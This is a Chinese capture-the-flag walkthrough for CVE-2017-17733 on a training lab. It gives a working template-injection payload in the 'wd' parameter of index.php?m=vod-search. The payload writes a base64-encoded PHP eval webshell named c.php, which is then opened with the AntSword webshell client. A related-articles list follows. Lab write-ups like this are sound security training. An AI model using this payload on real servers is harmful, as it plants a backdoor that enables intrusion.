春秋云境CVE-2017-17733

1.阅读靶场介绍

这里可以给各位讲一下自己的愚见

就是涉及这些字眼的靶场介绍"远程攻击者可借助index.php?m=vod-search请求中的'wd'参数利用该漏洞执行命令。"

简单来说就是:关于路径还有攻击参数的

我们都可以直接使用hackbar这种形式的工具去完成webshell

2.启动靶场

我们会得到一个如下的页面

接下来就是去攻克他了,其实也是一个很简单的步骤

3.poc

我们对页面点击F12

然后输入这个url

https://eci-2zedfyzgnxg3tgaoyz2u.cloudeci1.ichunqiu.com:80/index.php?m=vod-search

再post这个参数

wd={if-A:print(fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29)}{endif-A}

这里的意思就是发送一个参数给这个url

文件是c.php,内容是c(密码)

这里我们可以去访问一下
https://eci-2zedfyzgnxg3tgaoyz2u.cloudeci1.ichunqiu.com:80/c.php

这就说明上面的所有步骤都是成功的

好啦接下里就是中国蚁剑启动

输入完如上的数据后,点击测试后添加

进去就是这个页面哟

flag就在你们面前了

恭喜各位彦祖和亦非们又攻克一个靶场了

感谢你们宝贵的时间

相关推荐
2601_962364972 小时前
面向设备厂商:Windows Hello 认证摄像头核心要点
windows·安全·电脑
云边云科技_云网融合4 小时前
工业互联网组网方案全景解析:从低延迟网络到安全隔离的四大核心支柱
网络·安全·php
小程序设计4 小时前
linux防火墙研究与实现
网络·安全
数据知道4 小时前
加密流量分析——JA3 指纹、TLS 指纹识别与规避
网络·安全·网络安全·密码学
小程序设计5 小时前
Wi-Fi网络监控及无线终端定位系统的研究
网络·安全
这个DBA有点耶6 小时前
银行核心系统数据库迁移怎么选?6 步法+5 个避坑指南
数据库·安全·架构
聚铭网络6 小时前
智能时代 网安护航 | 聚铭网络精彩亮相2026南京市网络安全宣传周活动
网络安全
xiaohaiAIgeo7 小时前
【2026年】补风型通风柜要不要装?节能与安全如何权衡
人工智能·安全·科普知识
网易易盾7 小时前
AI Agent行为链安全:实时监控、权限管控与持续评测
人工智能·安全
爱学习的程序媛8 小时前
ICMP协议详解
网络·网络协议·网络安全·通信协议·icmp·网络运维